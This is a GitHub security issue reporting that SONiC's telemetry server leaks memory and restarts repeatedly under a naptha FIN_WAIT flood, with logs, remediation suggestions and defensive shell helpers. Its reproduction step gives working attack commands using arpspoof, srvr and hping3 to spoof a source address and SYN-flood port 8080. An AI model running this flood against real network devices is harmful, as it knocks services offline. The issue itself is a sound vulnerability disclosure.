sonic-net / sonic-buildimage

Scripts which perform an installable binary image build for SONiC

[security] Telemetry server susceptible to DoS attack #13490

Open jusherma opened 1 year ago

jusherma commented 1 year ago

Description

Performing a FIN_WAIT flood attack on the telemetry server causes its memory consumption to grow continuously. Within about 30 seconds, monit notices the high memory utilization and starts logging warnings to /var/log/syslog. After about 10 minutes, monit restarts the telemetry service entirely.

Steps to reproduce the issue:

  1. The topology consists of a SONiC router connected to a VM running Kali Linux with naptha installed. eth1 on the Kali VM is connected directly to Ethernet0 on the SONiC router, with the following IP addresses:
     | Device       | Interface | IP         |
     |--------------|-----------|------------|
     | Kali Linux   | eth1      | 172.31.0.1 |
     | SONiC Router | Ethernet0 | 172.31.0.2 |
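  2. The following commands are run concurrently on the Kali VM to launch a FIN_WAIT flood attack. 172.31.0.6 is a spoofed source address: arpspoof makes the router send traffic for it to the Kali VM, and hping3 sends SYNs to the telemetry port (8080) from that address: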

    arpspoof -i eth1 -t 172.31.0.2 172.31.0.6 > /tmp/arpspoof 2>&1 & \
    srvr -SAa -i eth1 172.31.0.6 > /tmp/srvr 2>&1 & \
    hping3 172.31.0.2 -p 8080 -S -a 172.31.0.6 -i u10000 -q
  3. The warnings mentioned above appear in /var/log/syslog within 30 seconds of the start of the attack. After about 10 minutes, the telemetry server is restarted for the first time. The telemetry server/container then keeps restarting every 10 minutes for as long as the attack persists.
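
On the router side, one way to watch the flood build up is to count the TCP sockets on the telemetry port by state while the attack runs. The sketch below is a hypothetical helper (`tcp_state_counts` is not part of SONiC). It assumes that the iproute2 `ss` tool is available on the router and that 8080 is the telemetry port, as in the `hping3` command above. It does not predict which states will accumulate; it only tallies what `ss` reports.

```shell
#!/bin/sh
# Hypothetical helper (not part of SONiC): count TCP sockets whose local
# port matches $1, grouped by state. Expects `ss -tan` output on stdin,
# where column 1 is the state and column 4 is "local-address:port".
tcp_state_counts() {
    port="$1"
    awk -v port="$port" '
        NR > 1 && $4 ~ (":" port "$") { count[$1]++ }  # NR > 1 skips the header row
        END { for (s in count) print s, count[s] }
    ' | LC_ALL=C sort
}

# Example (run on the SONiC router while the attack is in progress):
#   ss -tan | tcp_state_counts 8080
```

Running it every few seconds, for example under `watch`, shows whether any state grows in step with the memory figures in the logs.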

Describe the results you received:

Dec  3 03:23:56.483574 sonic INFO memory_checker: [telemetry]: Memory usage (483078963.2 Bytes) is larger than the threshold (419430400 Bytes)!

Dec  3 03:33:54.851735 sonic ERR monit[501]: 'container_memory_telemetry' status failed (3) -- [telemetry]: Memory usage (2661805981.696 Bytes) is larger than the threshold (419430400 Bytes)!
Dec  3 03:33:54.852363 sonic INFO monit[501]: 'container_memory_telemetry' exec: '/usr/bin/restart_service telemetry'
Dec  3 03:33:54.978859 sonic INFO restart_service: Resetting failed status of service 'telemetry' ...
Dec  3 03:33:55.023909 sonic INFO restart_service: Succeeded to reset failed status of service 'telemetry.service'.
Dec  3 03:33:55.024342 sonic INFO restart_service: Restarting service 'telemetry' ...
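
The byte counts in these log lines are easier to compare in MiB. The sketch below converts them and estimates the average growth rate between the first warning and the restart. The `mem_report` function is hypothetical, and its inputs are copied from the excerpt above. The 598.368161 s interval is the difference between the two timestamps, and the rate is a simple average that assumes roughly steady growth over that window.

```shell
#!/bin/sh
# Hypothetical helper: summarize the memory_checker/monit figures.
# Arguments: threshold in bytes, bytes at the first warning, bytes at the
# restart, and seconds elapsed between those two log lines.
mem_report() {
    awk -v t="$1" -v a="$2" -v b="$3" -v dt="$4" 'BEGIN {
        mib = 1024 * 1024
        printf "threshold:  %.2f MiB\n", t / mib
        printf "first hit:  %.2f MiB\n", a / mib
        printf "at restart: %.2f MiB (%.1fx threshold)\n", b / mib, b / t
        printf "growth:     %.2f MiB/s\n", (b - a) / dt / mib
    }'
}

# 03:23:56.483574 -> 03:33:54.851735 is 598.368161 seconds.
mem_report 419430400 483078963.2 2661805981.696 598.368161
```

With these inputs it reports a 400.00 MiB threshold, 460.70 MiB at the first warning, 2538.50 MiB (about 6.3x the threshold) at the restart, and an average growth of about 3.47 MiB/s.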

Describe the results you expected:

  1. A DoS attack should not cause the telemetry process to leak memory.
  2. The telemetry server should not listen on all interfaces; it should listen on the management interface only.
  3. The telemetry server should be disabled by default to reduce the attack surface on systems that don't use it.
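
To check the second expectation on a given image, look at the address the telemetry listener is bound to. In `ss` output, `*`, `0.0.0.0`, or `[::]` in the local-address column means the socket accepts connections on every interface, including front-panel ports such as Ethernet0. The helper below is a hypothetical sketch that assumes `ss -tln` output and port 8080. It exits with status 0 when it finds such a wildcard listener.

```shell
#!/bin/sh
# Hypothetical helper: succeed (exit 0) if something listens on port $1
# via a wildcard address, i.e. on all interfaces. Expects `ss -tln` output
# on stdin, where column 4 is "local-address:port".
listens_on_all_interfaces() {
    port="$1"
    awk -v port="$port" '
        NR > 1 && $4 ~ (":" port "$") {
            # Strip the trailing ":port" to leave only the address part.
            addr = substr($4, 1, length($4) - length(port) - 1)
            if (addr == "*" || addr == "0.0.0.0" || addr == "[::]") found = 1
        }
        END { exit (found ? 0 : 1) }
    '
}

# Example (run on the SONiC router):
#   if ss -tln | listens_on_all_interfaces 8080; then
#       echo "telemetry port is exposed on all interfaces"
#   fi
```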

Output of show version:

This was seen on 5c7c789, but it was reproducible on every recent version of SONiC that I tried.

Additional information you deem important (e.g. issue happens only occasionally):

See this paper for more information on naptha DoS attack: https://www.giac.org/paper/gcih/168/naptha-remote-dos-rs-denial-service-resources-starvation-attack/101321

Suggested remediation steps

The memory leak needs to be fixed in the telemetry server. Additionally, the telemetry server should not be listening on all interfaces by default. It probably shouldn't be enabled by default either.

As noted above, this attack came in through an interface meant for routed traffic, not through the management interface. Reducing the number of interfaces that accept telemetry requests, and keeping the server disabled until the user explicitly enables it, would both reduce the attack surface here.
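
Until the server itself binds only to the management interface, a host firewall rule is one possible stopgap. This is an illustrative sketch, not a fix proposed in this issue. The function name is hypothetical. It assumes out-of-band management on `eth0` without a management VRF and uses the telemetry port 8080 from the reproduction above. It only prints the `iptables`/`ip6tables` commands, so they can be reviewed before being applied as root. It does nothing about the memory leak itself. On SONiC, rules added by hand may also be rewritten by the control-plane ACL daemon (caclmgrd).

```shell
#!/bin/sh
# Hypothetical stopgap: print firewall commands that accept telemetry traffic
# only on loopback and the management interface, dropping it elsewhere.
# Defaults (eth0, 8080) are assumptions taken from the reproduction above.
telemetry_mgmt_only_rules() {
    mgmt_if="${1:-eth0}"
    port="${2:-8080}"
    for tool in iptables ip6tables; do
        # Inserted first, so it ends up just below the ACCEPT rule that follows.
        printf '%s -I INPUT -p tcp --dport %s ! -i %s -j DROP\n' "$tool" "$port" "$mgmt_if"
        # Inserted last, so it sits at the top: local (loopback) clients keep working.
        printf '%s -I INPUT -p tcp --dport %s -i lo -j ACCEPT\n' "$tool" "$port"
    done
}

# Review the output, then apply it as root, e.g.:
#   telemetry_mgmt_only_rules eth0 8080 | sudo sh
```

Both rules use `-I`, so the rule inserted later lands above the earlier one. That is why the loopback ACCEPT is emitted after the DROP.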

gechiang commented 1 year ago

@qiluo-msft please help investigate and resolve the DoS threat.